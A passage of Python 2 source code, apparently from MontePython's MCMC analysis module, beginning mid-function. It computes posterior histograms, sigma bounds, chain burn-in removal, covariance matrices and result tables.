top += (0.25*(water_level + histogram[indices[0]]) *
delta*(histogram[indices[0]]-water_level) /
(histogram[indices[0]]-left_edge))
# right
if indices[-1] < (len(histogram)-1):
top += (0.5*(water_level + histogram[indices[-1]]) *
delta*(histogram[indices[-1]]-water_level) /
(histogram[indices[-1]]-histogram[indices[-1]+1]))
else:
if (right_edge > water_level):
top += 0.25*(right_edge+histogram[indices[-1]])*delta
else:
top += (0.25*(water_level + histogram[indices[-1]]) *
delta * (histogram[indices[-1]]-water_level) /
(histogram[indices[-1]]-right_edge))
if top/norm >= level:
water_level_down = water_level
else:
water_level_up = water_level
# safeguard, just in case
iterations += 1
if (iterations > 1000):
warnings.warn(
"the loop to check for sigma deviations was " +
"taking too long to converge")
failed = True
break
# min
if failed:
bounds[j][0] = np.nan
elif indices[0] > 0:
bounds[j][0] = bincenters[indices[0]] - delta*(histogram[indices[0]]-water_level)/(histogram[indices[0]]-histogram[indices[0]-1])
else:
if (left_edge > water_level):
bounds[j][0] = bincenters[0]-0.5*delta
else:
bounds[j][0] = bincenters[indices[0]] - 0.5*delta*(histogram[indices[0]]-water_level)/(histogram[indices[0]]-left_edge)
# max
if failed:
bounds[j][1] = np.nan
elif indices[-1] < (len(histogram)-1):
bounds[j][1] = bincenters[indices[-1]] + delta*(histogram[indices[-1]]-water_level)/(histogram[indices[-1]]-histogram[indices[-1]+1])
else:
if (right_edge > water_level):
bounds[j][1] = bincenters[-1]+0.5*delta
else:
bounds[j][1] = bincenters[indices[-1]] + \
0.5*delta*(histogram[indices[-1]]-water_level) / \
(histogram[indices[-1]]-right_edge)
j += 1
for elem in bounds:
for j in (0, 1):
elem[j] -= info.mean[info.native_index]
return bounds
def write_h(info_file, indices, name, string, quantity, modifiers=None):
"""
Write one horizontal line of output
"""
info_file.write('\n '+name+'\t: ')
for i in indices:
info_file.write(string % quantity[i]+'\t')
def cubic_interpolation(info, hist, bincenters):
"""
Small routine to accomodate the absence of the interpolate module
"""
# we start from a try becuase if anything goes wrong, we want to return the raw histogram rather than nothing
try:
# test that all elements are strictly positive, otherwise we could not take the log, and we must switch to the robust method
for i,elem in enumerate(hist):
if elem == 0.:
hist[i] = 1.e-99
elif elem <0:
print hist[i]
raise exception()
# One of our methods (using polyfit) does assume that the input histogram has a maximum value of 1.
# If in a future version this is not guaranteedanymore, we should renormalise it here.
# This is important for computing weights and thresholds.
# The threshold below which the likelihood will be
# approximated as zero is hard-codeed here (could become an
# input parameter but that would not clearly be useful).:
threshold = 1.e-3
# prepare the interpolation on log(Like):
ln_hist = np.log(hist)
# define a finer grid on a wider range (assuming that the following method is fine both for inter- and extra-polation)
left = max(info.boundaries[info.native_index][0],bincenters[0]-2.5*(bincenters[1]-bincenters[0]))
right = min(info.boundaries[info.native_index][1],bincenters[-1]+2.5*(bincenters[-1]-bincenters[-2]))
interp_grid = np.linspace(left, right, (len(bincenters)+4)*10+1)
######################################
# polynomial fit method (default): #
#####################################W
if info.posterior_smoothing >= 2:
# the points in the histogram with a very low likelihood (i.e. hist[i]<<1 hist is normalised to a maximum of one)
# have a lot of Poisson noise and are unreliable. However, if we do nothing, they may dominate the outcome of the fitted polynomial.
# Hence we can:
# 1) give them less weight (weight = sqrt(hist) seems to work well)
# 2) cut them at some threshold value and base the fit only on higher points
# 3) both
# the one working best seems to be 2). We also wrote 1) below, but copmmented out.
# method 1):
#f = np.poly1d(np.polyfit(bincenters,ln_hist,info.posterior_smoothing,w=np.sqrt(hist)))
#interp_hist = f(interp_grid)
# method 2):
# find index values such that hist is negligble everywhere excepted in hist[sub_indices[0]], hist[sub_indices[-1]]
sub_indices = [i for i,elem in enumerate(hist) if elem > threshold]
# The interpolation is done precisely in this range: hist[sub_indices[0]] < x < hist[sub_indices[-1]]
g = np.poly1d(np.polyfit(bincenters[sub_indices],ln_hist[sub_indices],info.posterior_smoothing)) #,w=np.sqrt(hist[sub_indices])))
# The extrapolation is done in a range including one more bin on each side, excepted when the boundarty is hit
extrapolation_range_left = [info.boundaries[info.native_index][0] if sub_indices[0] == 0 else bincenters[sub_indices[0]-1]]
extrapolation_range_right = [info.boundaries[info.native_index][1] if sub_indices[-1] == len(hist)-1 else bincenters[sub_indices[-1]+1]]
# outisde of this range, log(L) is brutally set to a negligible value,e, log(1.e-10)
interp_hist = [g(elem) if (elem > extrapolation_range_left and elem < extrapolation_range_right) else np.log(1.e-10) for elem in interp_grid]
elif info.posterior_smoothing<0:
raise io_mp.AnalyzeError(
"You passed --posterior-smoothing %d, this value is not understood"%info.posterior_smoothing)
############################################################
# other methods: #
# - linear inter/extra-polation if posterior_smoothing = 0 #
# - cubic inter/extra-polation if posterior_smoothing = 0 #
############################################################
else:
# try first inter/extra-polation
try:
# prepare to interpolate and extrapolate:
if info.posterior_smoothing == 0:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='linear', fill_value='extrapolate')
else:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='cubic', fill_value='extrapolate')
interp_hist = f(interp_grid)
# failure probably caused by old scipy not having the fill_value='extrapolate' argument. Then, only interpoolate.
except:
# define a finer grid but not a wider one
left = max(info.boundaries[info.native_index][0],bincenters[0])
right = min(info.boundaries[info.native_index][1],bincenters[-1])
interp_grid = np.linspace(left, right, len(bincenters)*10+1)
# prepare to interpolate only:
if info.posterior_smoothing == 0:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='linear')
else:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='cubic')
interp_hist = f(interp_grid)
# final steps used b y all methods
# go back from ln_Like to Like
interp_hist = np.exp(interp_hist)
# re-normalise the interpolated curve
interp_hist = interp_hist / interp_hist.max()
return interp_hist, interp_grid
except:
# we will end up here if anything went wrong before
# do nothing (raw histogram)
warnings.warn(
"The 1D posterior could not be processed normally, probably" +
"due to incomplete or obsolete numpy and/or scipy versions." +
"So the raw histograms will be plotted.")
return hist, bincenters
def write_histogram(hist_file_name, x_centers, hist):
"""
Store the posterior distribution to a file
"""
with open(hist_file_name, 'w') as hist_file:
hist_file.write("# 1d posterior distribution\n")
hist_file.write("\n# x_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in x_centers])+"\n")
hist_file.write("\n# Histogram\n")
hist_file.write(", ".join(
[str(elem) for elem in hist])+"\n")
print 'wrote ', hist_file_name
def read_histogram(histogram_path):
"""
Recover a stored 1d posterior
"""
with open(histogram_path, 'r') as hist_file:
for line in hist_file:
if line:
if line.find("# x_centers") != -1:
x_centers = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Histogram") != -1:
hist = [float(elem) for elem in
hist_file.next().split(",")]
x_centers = np.array(x_centers)
hist = np.array(hist)
return x_centers, hist
def write_histogram_2d(hist_file_name, x_centers, y_centers, extent, hist):
"""
Store the histogram information to a file, to plot it later
"""
with open(hist_file_name, 'w') as hist_file:
hist_file.write("# Interpolated histogram\n")
hist_file.write("\n# x_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in x_centers])+"\n")
hist_file.write("\n# y_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in y_centers])+"\n")
hist_file.write("\n# Extent\n")
hist_file.write(", ".join(
[str(elem) for elem in extent])+"\n")
hist_file.write("\n# Histogram\n")
for line in hist:
hist_file.write(", ".join(
[str(elem) for elem in line])+"\n")
def read_histogram_2d(histogram_path):
"""
Read the histogram information that was stored in a file.
To use it, call something like this:
.. code::
x_centers, y_centers, extent, hist = read_histogram_2d_from_file(path)
fig, ax = plt.subplots()
ax.contourf(
y_centers, x_centers, hist, extent=extent,
levels=ctr_level(hist, [0.68, 0.95]),
zorder=5, cma=plt.cm.autumn_r)
plt.show()
"""
with open(histogram_path, 'r') as hist_file:
length = 0
for line in hist_file:
if line:
if line.find("# x_centers") != -1:
x_centers = [float(elem) for elem in
hist_file.next().split(",")]
length = len(x_centers)
elif line.find("# y_centers") != -1:
y_centers = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Extent") != -1:
extent = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Histogram") != -1:
hist = []
for index in range(length):
hist.append([float(elem) for elem in
hist_file.next().split(",")])
x_centers = np.array(x_centers)
y_centers = np.array(y_centers)
extent = np.array(extent)
hist = np.array(hist)
return x_centers, y_centers, extent, hist
def clean_conversion(module_name, tag, folder):
"""
Execute the methods "convert" from the different sampling algorithms
Returns True if something was made, False otherwise
"""
has_module = False
subfolder_name = tag+"_subfolder"
try:
module = importlib.import_module(module_name)
subfolder = getattr(module, subfolder_name)
has_module = True
except ImportError:
# The module is not installed, the conversion can not take place
pass
if has_module and os.path.isdir(folder):
# Remove any potential trailing slash
folder = os.path.join(
*[elem for elem in folder.split(os.path.sep) if elem])
if folder.split(os.path.sep)[-1] == subfolder:
try:
getattr(module, 'from_%s_output_to_chains' % tag)(folder)
except IOError:
raise io_mp.AnalyzeError(
"You asked to analyze a %s folder which " % tag +
"seems to come from an unfinished run, or to be empty " +
"or corrupt. Please make sure the run went smoothly " +
"enough.")
warnings.warn(
"The content of the %s subfolder has been " % tag +
"translated for Monte Python. Please run an "
"analysis of the entire folder now.")
return True
else:
return False
def separate_files(files):
"""
Separate the input files in folder
Given all input arguments to the command line files entry, separate them in
a list of lists, grouping them by folders. The number of identified folders
will determine the number of information instances to create
"""
final_list = []
temp = [files[0]]
folder = (os.path.dirname(files[0]) if os.path.isfile(files[0])
else files[0])
if len(files) > 1:
for elem in files[1:]:
new_folder = (os.path.dirname(elem) if os.path.isfile(elem)
else elem)
if new_folder == folder:
temp.append(elem)
else:
folder = new_folder
final_list.append(temp)
temp = [elem]
final_list.append(temp)
return final_list
def recover_folder_and_files(files):
"""
Distinguish the cases when analyze is called with files or folder
Note that this takes place chronologically after the function
`separate_files`"""
# The following list defines the substring that a chain should contain for
# the code to recognise it as a proper chain.
substrings = ['.txt', '__']
# The following variable defines the substring that identify error_log
# files and therefore there must not be taken into account in the analysis.
substring_err = 'error_log'
limit = 10
# If the first element is a folder, grab all chain files inside
if os.path.isdir(files[0]):
folder = os.path.normpath(files[0])
files = [os.path.join(folder, elem) for elem in os.listdir(folder)
if not os.path.isdir(os.path.join(folder, elem))
and not os.path.getsize(os.path.join(folder, elem)) < limit
and (substring_err not in elem)
and all([x in elem for x in substrings])]
# Otherwise, extract the folder from the chain file-name.
else:
# If the name is completely wrong, say it
if not os.path.exists(files[0]):
raise io_mp.AnalyzeError(
"You provided a non-existant folder/file to analyze")
folder = os.path.relpath(
os.path.dirname(os.path.realpath(files[0])), os.path.curdir)
files = [os.path.join(folder, elem) for elem in os.listdir(folder)
if os.path.join(folder, elem) in np.copy(files)
and not os.path.isdir(os.path.join(folder, elem))
and not os.path.getsize(os.path.join(folder, elem)) < limit
and (substring_err not in elem)
and all([x in elem for x in substrings])]
basename = os.path.basename(folder)
return folder, files, basename
def extract_array(line):
"""
Return the array on the RHS of the line
>>> extract_array("toto = ['one', 'two']\n")
['one', 'two']
>>> extract_array('toto = ["one", 0.2]\n')
['one', 0.2]
"""
# Recover RHS of the equal sign, and remove surrounding spaces
rhs = line.split('=')[-1].strip()
# Remove array signs
rhs = rhs.strip(']').lstrip('[')
# Recover each element of the list
sequence = [e.strip().strip('"').strip("'") for e in rhs.split(',')]
for index, elem in enumerate(sequence):
try:
sequence[index] = int(elem)
except ValueError:
try:
sequence[index] = float(elem)
except ValueError:
pass
return sequence
def extract_dict(line):
"""
Return the key and value of the dictionary element contained in line
>>> extract_dict("something['toto'] = [0, 1, 2, -2, 'cosmo']")
'toto', [0, 1, 2, -2, 'cosmo']
"""
# recovering the array
sequence = extract_array(line)
# Recovering only the LHS
lhs = line.split('=')[0].strip()
# Recovering the name from the LHS
name = lhs.split('[')[-1].strip(']')
name = name.strip('"').strip("'")
return name, sequence
def extract_parameter_names(info):
"""
Reading the log.param, store in the Information instance the names
"""
backup_names = []
plotted_parameters = []
boundaries = []
ref_names = []
tex_names = []
scales = []
with open(info.param_path, 'r') as param:
for line in param:
if line.find('#') == -1:
if line.find('data.experiments') != -1:
info.experiments = extract_array(line)
if line.find('data.parameters') != -1:
name, array = extract_dict(line)
original = name
# Rename the names according the .extra file (opt)
if name in info.to_change.iterkeys():
name = info.to_change[name]
# If the name corresponds to a varying parameter (fourth
# entry in the initial array being non-zero, or a derived
# parameter (could be designed as fixed, it does not make
# any difference)), then continue the process of analyzing.
if array[3] != 0 or array[5] == 'derived':
# The real name is always kept, to have still the class
# names in the covmat
backup_names.append(original)
# With the list "to_plot", we can potentially restrict
# the variables plotted. If it is empty, though, simply
# all parameters will be plotted.
if info.to_plot == []:
plotted_parameters.append(name)
else:
if name in info.to_plot:
plotted_parameters.append(name)
# Append to the boundaries array
boundaries.append([
None if elem == 'None' or (isinstance(elem, int)
and elem == -1)
else elem for elem in array[1:3]])
ref_names.append(name)
# Take care of the scales
scale = array[4]
rescale = 1.
if name in info.new_scales.iterkeys():
scale = info.new_scales[name]
rescale = info.new_scales[name]/array[4]
scales.append(rescale)
# Given the scale, decide for the pretty tex name
number = 1./scale
tex_names.append(
io_mp.get_tex_name(name, number=number))
scales = np.diag(scales)
info.ref_names = ref_names
info.tex_names = tex_names
info.boundaries = boundaries
info.backup_names = backup_names
info.scales = scales
# Beware, the following two numbers are different. The first is the total
# number of parameters stored in the chain, whereas the second is for
# plotting purpose only.
info.number_parameters = len(ref_names)
info.plotted_parameters = plotted_parameters
def find_maximum_of_likelihood(info):
"""
Finding the global maximum of likelihood
min_minus_lkl will be appended with all the maximum likelihoods of files,
then will be replaced by its own maximum. This way, the global
maximum likelihood will be used as a reference, and not each chain's
maximum.
"""
min_minus_lkl = []
for chain_file in info.files:
# cheese will brutally contain everything (- log likelihood) in the
# file chain_file being scanned.
# This could potentially be faster with pandas, but is already quite
# fast
#
# This would read the chains including comment lines:
#cheese = (np.array([float(line.split()[1].strip())
# for line in open(chain_file, 'r')]))
#
# This reads the chains excluding comment lines:
with open(chain_file, 'r') as f:
cheese = (np.array([float(line.split()[1].strip())
for line in ifilterfalse(iscomment,f)]))
try:
min_minus_lkl.append(cheese[:].min())
except ValueError:
pass
# beware, it is the min because we are talking about
# '- log likelihood'
# Selecting only the true maximum.
try:
min_minus_lkl = min(min_minus_lkl)
except ValueError:
raise io_mp.AnalyzeError(
"No decently sized chain was found in the desired folder. " +
"Please wait to have more accepted point before trying " +
"to analyze it.")
info.min_minus_lkl = min_minus_lkl
def remove_bad_points(info):
"""
Create an array with all the points from the chains, after removing non-markovian, burn-in and fixed fraction
"""
# spam will brutally contain all the chains with sufficient number of
# points, after the burn-in was removed.
spam = list()
# Recover the longest file name, for pleasing display
max_name_length = max([len(e) for e in info.files])
# Total number of steps done:
steps = 0
accepted_steps = 0
# Open the log file
log = open(info.log_path, 'w')
for index, chain_file in enumerate(info.files):
# To improve presentation, and print only once the full path of the
# analyzed folder, we recover the length of the path name, and
# create an empty complementary string of this length
total_length = 18+max_name_length
empty_length = 18+len(os.path.dirname(chain_file))+1
basename = os.path.basename(chain_file)
if index == 0:
exec "print '--> Scanning file %-{0}s' % chain_file,".format(
max_name_length)
else:
exec "print '%{0}s%-{1}s' % ('', basename),".format(
empty_length, total_length-empty_length)
# cheese will brutally contain everything in the chain chain_file being
# scanned
#
# This would read the chains including comment lines:
#cheese = (np.array([[float(elem) for elem in line.split()]
# for line in open(chain_file, 'r')]))
#
# This read the chains excluding comment lines:
with open(chain_file, 'r') as f:
cheese = (np.array([[float(elem) for elem in line.split()]
for line in ifilterfalse(iscomment,f)]))
# If the file contains a broken line with a different number of
# elements, the previous array generation might fail, and will not have
# the correct shape. Hence the following command will fail. To avoid
# that, the error is caught.
try:
local_min_minus_lkl = cheese[:, 1].min()
except IndexError:
raise io_mp.AnalyzeError(
"Error while scanning %s." % chain_file +
" This file most probably contains "
"an incomplete line, rendering the analysis impossible. "
"I think that the following line(s) is(are) wrong:\n %s" % (
'\n '.join(
['-> %s' % line for line in
open(chain_file, 'r') if
len(line.split()) != len(info.backup_names)+2])))
line_count = float(sum(1 for line in open(chain_file, 'r')))
# Logging the information obtained until now.
number_of_steps = cheese[:, 0].sum()
log.write("%s\t " % os.path.basename(chain_file))
log.write(" Number of steps:%d\t" % number_of_steps)
log.write(" Steps accepted:%d\t" % line_count)
log.write(" acc = %.2g\t" % (float(line_count)/number_of_steps))
log.write("min(-loglike) = %.2f\n" % local_min_minus_lkl)
steps += number_of_steps
accepted_steps += line_count
# check if analyze() is called directly by the user, or by the mcmc loop during an updating phase
try:
# command_line.update is defined when called by the mcmc loop
info.update
except:
# in case it was not defined (i.e. when analyze() is called directly by user), set it to False
info.update = 0
# Removing non-markovian part, burn-in, and fraction= (1 - keep-fraction)
start = 0
markovian=0
try:
# Read all comments in chains about times when proposal was updated
# The last of these comments gives the number of lines to be skipped in the files
if info.markovian and not info.update:
with open(chain_file, 'r') as f:
for line in ifilter(iscomment,f):
start = int(line.split()[2])
markovian = start
# Remove burn-in, defined as all points until the likelhood reaches min_minus_lkl+LOG_LKL_CUTOFF
while cheese[start, 1] > info.min_minus_lkl+LOG_LKL_CUTOFF:
start += 1
burnin = start-markovian
# Remove fixed fraction as requested by user (usually not useful if non-markovian is also removed)
if info.keep_fraction < 1:
start = start + int((1.-info.keep_fraction)*(line_count - start))
print ": Removed",
if info.markovian:
print "%d non-markovian points," % markovian,
print "%d points of burn-in," % burnin,
if info.keep_fraction < 1:
print "and first %.0f percent," % (100.*(1-info.keep_fraction)),
print "keep %d steps" % (line_count-start)
except IndexError:
print ': Removed everything: chain not converged'
# ham contains cheese without the burn-in, if there are any points
# left (more than 5)
if np.shape(cheese)[0] > start+5:
ham = np.copy(cheese[int(start)::])
# Deal with single file case
if len(info.files) == 1:
warnings.warn("Convergence computed for a single file")
bacon = np.copy(cheese[::3, :])
egg = np.copy(cheese[1::3, :])
sausage = np.copy(cheese[2::3, :])
spam.append(bacon)
spam.append(egg)
spam.append(sausage)
continue
# Adding resulting table to spam
spam.append(ham)
# Test the length of the list
if len(spam) == 0:
raise io_mp.AnalyzeError(
"No decently sized chain was found. " +
"Please wait a bit to analyze this folder")
# Applying now new rules for scales, if the name is contained in the
# referenced names
for name in info.new_scales.iterkeys():
try:
index = info.ref_names.index(name)
for i in xrange(len(spam)):
spam[i][:, index+2] *= 1./info.scales[index, index]
except ValueError:
# there is nothing to do if the name is not contained in ref_names
pass
info.steps = steps
info.accepted_steps = accepted_steps
return spam
def compute_mean(mean, spam, total):
"""
"""
for i in xrange(np.shape(mean)[1]):
for j in xrange(len(spam)):
submean = np.sum(spam[j][:, 0]*spam[j][:, i+2])
mean[j+1, i] = submean / total[j+1]
mean[0, i] += submean
mean[0, i] /= total[0]
def compute_variance(var, mean, spam, total):
"""
"""
for i in xrange(np.shape(var)[1]):
for j in xrange(len(spam)):
var[0, i] += np.sum(
spam[j][:, 0]*(spam[j][:, i+2]-mean[0, i])**2)
var[j+1, i] = np.sum(
spam[j][:, 0]*(spam[j][:, i+2]-mean[j+1, i])**2) / \
(total[j+1]-1)
var[0, i] /= (total[0]-1)
def compute_covariance_matrix(info):
"""
"""
covar = np.zeros((len(info.ref_names), len(info.ref_names)))
for i in xrange(len(info.ref_names)):
for j in xrange(i, len(info.ref_names)):
covar[i, j] = (
info.chain[:, 0]*(
(info.chain[:, i+2]-info.mean[i]) *
(info.chain[:, j+2]-info.mean[j]))).sum()
if i != j:
covar[j, i] = covar[i, j]
covar /= info.total
# Removing scale factors in order to store true parameter covariance
covar = np.dot(info.scales.T, np.dot(covar, info.scales))
return covar
def adjust_ticks(param, information_instances):
"""
"""
if len(information_instances) == 1:
return
# Recovering all x_range and ticks entries from the concerned information
# instances
x_ranges = []
ticks = []
for info in information_instances:
if not info.ignore_param:
x_ranges.append(info.x_range[info.native_index])
ticks.append(info.ticks[info.native_index])
# The new x_range and tick should min/max all the existing ones
new_x_range = np.array(
[min([e[0] for e in x_ranges]), max([e[1] for e in x_ranges])])
temp_ticks = np.array(
[min([e[0] for e in ticks]), max([e[-1] for e in ticks])])
new_ticks = np.linspace(temp_ticks[0],
temp_ticks[1],
info.ticknumber)
for info in information_instances:
if not info.ignore_param:
info.x_range[info.native_index] = new_x_range
info.ticks[info.native_index] = new_ticks
def store_contour_coordinates(info, name1, name2, contours):
"""docstring"""
file_name = os.path.join(
info.folder, 'plots', '{0}_2d_{1}-{2}.dat'.format(
info.basename, name1, name2))
with open(file_name, 'w') as plot_file:
plot_file.write(
'# contour for confidence level {0}\n'.format(
info.levels[1]))
for elem in contours.collections[0].get_paths():
points = elem.vertices
for k in range(np.shape(points)[0]):
plot_file.write("%.8g\t %.8g\n" % (
points[k, 0], points[k, 1]))
# stop to not include the inner contours
if k != 0:
if all(points[k] == points[0]):
plot_file.write("\n")
break
plot_file.write("\n\n")
plot_file.write(
'# contour for confidence level {0}\n'.format(
info.levels[0]))
for elem in contours.collections[1].get_paths():
points = elem.vertices
for k in range(np.shape(points)[0]):
plot_file.write("%.8g\t %.8g\n" % (
points[k, 0], points[k, 1]))
if k != 0:
if all(points[k] == points[0]):
plot_file.write("\n")
break
plot_file.write("\n\n")
def iscomment(s):
"""
Define what we call a comment in MontePython chain files
"""
return s.startswith('#')
class Information(object):
"""
Hold all information for analyzing runs
"""
# Counting the number of instances, to choose the color map
_ids = count(0)
# Flag checking the absence or presence of the interp1d function
has_interpolate_module = False
# Actual pairs of colors used by MP.
# For each pair, the first color is for the 95% contour,
# and the second for the 68% contour + the 1d probability.
# Note that, as with the other customisation options, you can specify new
# values for this in the extra plot_file.
MP_color = {
'Red':['#E37C80','#CE121F'],
'Blue':['#7A98F6','#1157EF'],
'Green':['#88B27A','#297C09'],
'Orange':['#F3BE82','#ED920F'],
'Grey':['#ABABAB','#737373'],
'Purple':['#B87294','#88004C']
}
# order used when several directories are analysed
MP_color_cycle = [
MP_color['Red'],
MP_color['Blue'],
MP_color['Green'],
MP_color['Orange'],
MP_color['Grey'],
MP_color['Purple']
]
# in the same order, list of transparency levels
alphas = [0.9, 0.9, 0.9, 0.9, 0.9, 0.9]
def __init__(self, command_line, other=None):
"""
The following initialization creates the three tables that can be
customized in an extra plot_file (see :mod:`parser_mp`).
Parameters
----------
command_line : Namespace
it contains the initialised command line arguments
"""
self.to_change = {}
"""
Dictionary whose keys are the old parameter names, and values are the
new ones. For instance :code:`{'beta_plus_lambda':'beta+lambda'}`
"""
self.to_plot = []
"""
Array of names of parameters to plot. If left empty, all will be
plotted.
.. warning::
If you changed a parameter name with :attr:`to_change`, you need to
give the new name to this array
"""
self.new_scales = {}
"""
Dictionary that redefines some scales. The keys will be the parameter
name, and the value its scale.
"""
# Assign a unique id to this instance
self.id = self._ids.next()
# Defining the sigma contours (1, 2 and 3-sigma)
self.levels = np.array([68.26, 95.4, 99.7])/100.
# Follows a bunch of initialisation to provide default members
self.ref_names, self.backup_names = [], []
self.scales, self.plotted_parameters = [], []
self.spam = []
# Store directly all information from the command_line object into this
# instance, except the protected members (begin and end with __)
for elem in dir(command_line):
if elem.find('__') == -1:
setattr(self, elem, getattr(command_line, elem))
# initialise the legend flags
self.plot_legend_1d = None
self.plot_legend_2d = None
# initialize the legend size to be the same as fontsize, but can be
# altered in the extra file
self.legendsize = self.fontsize
self.legendnames = []
# initialize the customisation script flags
self.custom1d = []
self.custom2d = []
# initialise the dictionary enmforcing limit
self.force_limits = {}
# Read a potential file describing changes to be done for the parameter
# names, and number of paramaters plotted (can be let empty, all will
# then be plotted), but also the style of the plot. Note that this
# overrides the command line options
if command_line.optional_plot_file:
plot_file_vars = {'info': self,'plt': plt}
execfile(command_line.optional_plot_file, plot_file_vars)
# check and store keep_fraction
if command_line.keep_fraction<=0 or command_line.keep_fraction>1:
raise io_mp.AnalyzeError("after --keep-fraction you should pass a float >0 and <=1")
self.keep_fraction = command_line.keep_fraction
def remap_parameters(self, spam):
"""
Perform substitutions of parameters for analyzing
.. note::
for arbitrary combinations of parameters, the prior will not
necessarily be flat.
"""
if hasattr(self, 'redefine'):
for key, value in self.redefine.iteritems():
# Check that the key was an original name
if key in self.backup_names:
print ' /|\ Transforming', key, 'into', value
# We recover the indices of the key
index_to_change = self.backup_names.index(key)+2
print('/_o_\ The new variable will be called ' +
self.ref_names[self.backup_names.index(key)])
# Recover all indices of all variables present in the
# remapping
variable_names = [elem for elem in self.backup_names if
value.find(elem) != -1]
indices = [self.backup_names.index(name)+2 for name in
variable_names]
# Now loop over all files in spam
for i in xrange(len(spam)):
# Assign variables to their values
for index, name in zip(indices, variable_names):
exec("%s = spam[i][:, %i]" % (name, index))
# Assign to the desired index the combination
exec("spam[i][:, %i] = %s" % (index_to_change, value))
def define_ticks(self):
"""
"""
self.max_values = self.chain[:, 2:].max(axis=0)
self.min_values = self.chain[:, 2:].min(axis=0)
self.span = (self.max_values-self.min_values)
# Define the place of ticks, given the number of ticks desired, stored
# in conf.ticknumber
self.ticks = np.array(
[np.linspace(self.min_values[i]+self.span[i]*0.1,
self.max_values[i]-self.span[i]*0.1,
self.ticknumber) for i in range(len(self.span))])
# Define the x range (ticks start not exactly at the range boundary to
# avoid display issues)
self.x_range = np.array((self.min_values, self.max_values)).T
# In case the exploration hit a boundary (as defined in the parameter
# file), at the level of precision defined by the number of bins, the
# ticks and x_range should be altered in order to display this
# meaningful number instead.
for i in range(np.shape(self.ticks)[0]):
x_range = self.x_range[i]
bounds = self.boundaries[i]
# Left boundary
if bounds[0] is not None:
if abs(x_range[0]-bounds[0]) < self.span[i]/self.bins:
self.ticks[i][0] = bounds[0]
self.x_range[i][0] = bounds[0]
# Right boundary
if bounds[-1] is not None:
if abs(x_range[-1]-bounds[-1]) < self.span[i]/self.bins:
self.ticks[i][-1] = bounds[-1]
self.x_range[i][-1] = bounds[-1]
def write_information_files(self):
# Store in info_names only the tex_names that were plotted, for this
# instance, and in indices the corresponding list of indices. It also
# removes the $ signs, for clarity
self.info_names = [
name for index, name in enumerate(self.tex_names) if
self.ref_names[index] in self.plotted_parameters]
self.indices = [self.tex_names.index(name) for name in self.info_names]
self.tex_names = [name for index, name in enumerate(self.tex_names) if
self.ref_names[index] in self.plotted_parameters]
self.info_names = [name.replace('$', '') for name in self.info_names]
# Define the bestfit array
self.bestfit = np.zeros(len(self.ref_names))
for i in xrange(len(self.ref_names)):
self.bestfit[i] = self.chain[self.sorted_indices[0], :][2+i]
# Write down to the .h_info file all necessary information
self.write_h_info()
self.write_v_info()
self.write_tex()
def write_h_info(self):
with open(self.h_info_path, 'w') as h_info:
h_info.write(' param names\t: ')
for name in self.info_names:
h_info.write("%-14s" % name)
write_h(h_info, self.indices, 'R-1 values', '% .6f', self.R)
write_h(h_info, self.indices, 'Best Fit ', '% .6e', self.bestfit)
write_h(h_info, self.indices, 'mean ', '% .6e', self.mean)
write_h(h_info, self.indices, 'sigma ', '% .6e',
(self.bounds[:, 0, 1]-self.bounds[:, 0, 0])/2.)
h_info.write('\n')
write_h(h_info, self.indices, '1-sigma - ', '% .6e',
self.bounds[:, 0, 0])
write_h(h_info, self.indices, '1-sigma + ', '% .6e',
self.bounds[:, 0, 1])
write_h(h_info, self.indices, '2-sigma - ', '% .6e',
self.bounds[:, 1, 0])
write_h(h_info, self.indices, '2-sigma + ', '% .6e',
self.bounds[:, 1, 1])
write_h(h_info, self.indices, '3-sigma - ', '% .6e',
self.bounds[:, 2, 0])
write_h(h_info, self.indices, '3-sigma + ', '% .6e',
self.bounds[:, 2, 1])
# bounds
h_info.write('\n')
write_h(h_info, self.indices, '1-sigma > ', '% .6e',
self.mean+self.bounds[:, 0, 0])
write_h(h_info, self.indices, '1-sigma < ', '% .6e',
self.mean+self.bounds[:, 0, 1])
write_h(h_info, self.indices, '2-sigma > ', '% .6e',
self.mean+self.bounds[:, 1, 0])
write_h(h_info, self.indices, '2-sigma < ', '% .6e',
self.mean+self.bounds[:, 1, 1])
write_h(h_info, self.indices, '3-sigma > ', '% .6e',
self.mean+self.bounds[:, 2, 0])
write_h(h_info, self.indices, '3-sigma < ', '% .6e',
self.mean+self.bounds[:, 2, 1])
def write_v_info(self):
"""Write vertical info file"""
with open(self.v_info_path, 'w') as v_info:
v_info.write('%-15s\t: %-11s' % ('param names', 'R-1'))
v_info.write(' '.join(['%-11s' % elem for elem in [
'Best fit', 'mean', 'sigma', '1-sigma -', '1-sigma +',
'2-sigma -', '2-sigma +', '1-sigma >', '1-sigma <',
'2-sigma >', '2-sigma <']]))
for index, name in zip(self.indices, self.info_names):
v_info.write('\n%-15s\t: % .4e' % (name, self.R[index]))
v_info.write(' '.join(['% .4e' % elem for elem in [
self.bestfit[index], self.mean[index],
(self.bounds[index, 0, 1]-self.bounds[index, 0, 0])/2.,
self.bounds[index, 0, 0], self.bounds[index, 0, 1],
self.bounds[index, 1, 0], self.bounds[index, 1, 1],
self.mean[index]+self.bounds[index, 0, 0],
self.mean[index]+self.bounds[index, 0, 1],
self.mean[index]+self.bounds[index, 1, 0],
self.mean[index]+self.bounds[index, 1, 1]]]))
def write_tex(self):
"""Write a tex table containing the main results """
with open(self.tex_path, 'w') as tex:
tex.write("\\begin{tabular}{|l|c|c|c|c|} \n \\hline \n")
tex.write("Param & best-fit & mean$\pm\sigma$ ")
tex.write("& 95\% lower & 95\% upper \\\\ \\hline \n")
for index, name in zip(self.indices, self.tex_names):
tex.write("%s &" % name)
tex.write("$%.4g$ & $%.4g_{%.2g}^{+%.2g}$ " % (
self.bestfit[index], self.mean[index],
self.bounds[index, 0, 0], self.bounds[index, 0, 1]))
tex.write("& $%.4g$ & $%.4g$ \\\\ \n" % (
self.mean[index]+self.bounds[index, 1, 0],
self.mean[index]+self.bounds[index, 1, 1]))
tex.write("\\hline \n \\end{tabular} \\\\ \n")
